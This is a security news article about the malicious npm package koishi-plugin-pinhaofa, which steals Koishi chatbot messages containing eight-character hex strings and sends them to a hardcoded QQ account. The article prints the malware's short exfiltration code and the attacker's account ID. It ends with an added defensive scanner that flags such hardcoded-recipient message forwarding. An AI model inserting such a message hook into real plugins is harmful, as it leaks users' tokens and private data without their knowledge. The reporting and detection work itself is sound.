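Malicious npm Package Steals Sensitive Data in Real Time via Koishi Chatbots
Researchers discovered a malicious npm package that attacks Koishi chatbot users, stealing sensitive information and exfiltrating it via QQ; the attack affects industries such as banking, e-commerce and healthcare; organizations are advised to review their plugins and strengthen security measures to guard against the risk. 2025-5-20 10:14:9 Author: cybersecuritynews.com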

Malicious npm Package in Koishi Chatbots Silently Exfiltrates Sensitive Data in Real Time

Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting Koishi chatbot users through a malicious npm package.

The package, identified as “koishi-plugin-pinhaofa,” appears innocuous but contains a hidden data exfiltration mechanism that monitors all messages processed by the chatbot.

When the malware detects an eight-character hexadecimal string—often representing sensitive data like Git commit hashes, truncated JWTs, or API tokens—it immediately forwards the entire message to a hardcoded QQ account, potentially exposing user credentials and confidential information.


Koishi has emerged as a popular TypeScript framework for developing cross-platform chatbots that can operate simultaneously on QQ, Telegram, Discord, and other messaging services from a single codebase.

E-commerce chatbot use cases (Source – Socket.dev)

With over one thousand community plugins available in its marketplace, Koishi has become particularly attractive for businesses developing customer engagement solutions.

eMarketer predicts that by 2026, one-third of U.S. adults will rely on banking chatbots, highlighting the growing importance of chatbot security.

Socket.dev researchers identified the malicious package during routine security scans, flagging it as “Known malware” through their AI Scanner system.

The researchers noted that the malware’s seemingly narrow targeting approach—focusing only on messages containing eight-character hex strings—is particularly insidious, as it generates few false positives while maximizing the collection of high-value data.

The impact extends across multiple industries utilizing chatbots. Banking assistants might inadvertently disclose payment card numbers, e-commerce chatbots could leak order-status links containing authentication tokens, and healthcare bots might expose patient information.

Because Koishi plugins execute directly within the bot’s trusted environment, administrators who install plugins without thorough code reviews essentially grant the malicious code unrestricted access to read and modify every message passing through the system.

Infection Mechanism Analysis

What makes this attack particularly concerning is its elegant simplicity.

Rather than employing complex obfuscation techniques, the malware operates through just a few lines of straightforward JavaScript code that hooks into Koishi’s message handling system:

ctx.on("message", (session) => { // process every incoming message
    const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
    const content = session.content.replace(" ", "");
    if (hexRegex.test(content)) { // true if an exact 8-char hex string exists...         
        session.bot.sendPrivateMessage( // exfiltrate complete message text
            "1821181277", // threat actor's QQ UIN
            content);
        session.bot.sendPrivateMessage(
            extractAll8DigitHex(content)[0]);
    }
});

The malware’s exfiltration method is particularly effective at evading detection because it utilizes the same communication channels that legitimate chatbot traffic would use.

Since the stolen data exits via the chat protocol the bot normally employs, standard web filters and endpoint defenses may not differentiate between legitimate and malicious communications.

The package was published by a threat actor using the npm alias “kuminfennel” with a registration email matching the hardcoded QQ account ([email protected]).

Security experts recommend that organizations running Koishi chatbots immediately review their installed plugins and implement container-based isolation for bots to prevent unauthorized data transmission.

Additionally, implementing automated supply chain security tools like Socket’s GitHub application can help catch suspicious patterns during package installation, reducing the risk of malicious code entering production environments.
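
As an aid to the plugin review recommended above, the following added example (not code from Socket's report or from the Koishi project) scans plugin source text for private messages sent to a recipient fixed in the code, the pattern visible in the snippet shown earlier. The function name, the finding fields and both sample plugins are assumptions constructed for illustration.

```javascript
// Added example: a heuristic review aid, not a complete malware scanner.
// It flags plugin source that calls sendPrivateMessage() with a recipient
// written as a numeric literal instead of one derived from the session.

// Matches .sendPrivateMessage("<5-12 digits>", ...) with or without quotes.
const HARDCODED_RECIPIENT =
  /\.sendPrivateMessage\s*\(\s*(["'`]?)(\d{5,12})\1\s*[,)]/g;
// Matches a listener registered for every incoming message.
const MESSAGE_HOOK = /\.on\s*\(\s*["'`]message["'`]/;

function auditPluginSource(name, source) {
  const findings = [];
  const hooksAllMessages = MESSAGE_HOOK.test(source);
  for (const m of source.matchAll(HARDCODED_RECIPIENT)) {
    findings.push({
      plugin: name,
      // 1-based line number of the call, for the reviewer to jump to.
      line: source.slice(0, m.index).split("\n").length,
      recipient: m[2],
      // A fixed recipient inside a global message hook is the riskier case:
      // every message the bot sees can reach that account.
      severity: hooksAllMessages ? "high" : "medium",
    });
  }
  return findings;
}

// Constructed sample: forwards message content to a fixed account.
// "1000000001" is a placeholder, not an identifier from the report.
const SUSPICIOUS = [
  'ctx.on("message", (session) => {',
  '  if (/[0-9a-f]{8}/i.test(session.content)) {',
  '    session.bot.sendPrivateMessage("1000000001", session.content);',
  '  }',
  '});',
].join("\n");

// Constructed sample: replies only to the user who issued the command.
const BENIGN = [
  'ctx.command("ping").action(({ session }) =>',
  '  session.bot.sendPrivateMessage(session.userId, "pong"));',
].join("\n");

console.log(auditPluginSource("sample-suspicious", SUSPICIOUS));
console.log(auditPluginSource("sample-benign", BENIGN));
```

In practice the source strings would be the files of each installed koishi-plugin-* package; a finding is a prompt for manual review, since a recipient can also be assembled at runtime and escape a literal match.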



Article source: https://cybersecuritynews.com/malicious-npm-package-in-koishi-chatbots-silently/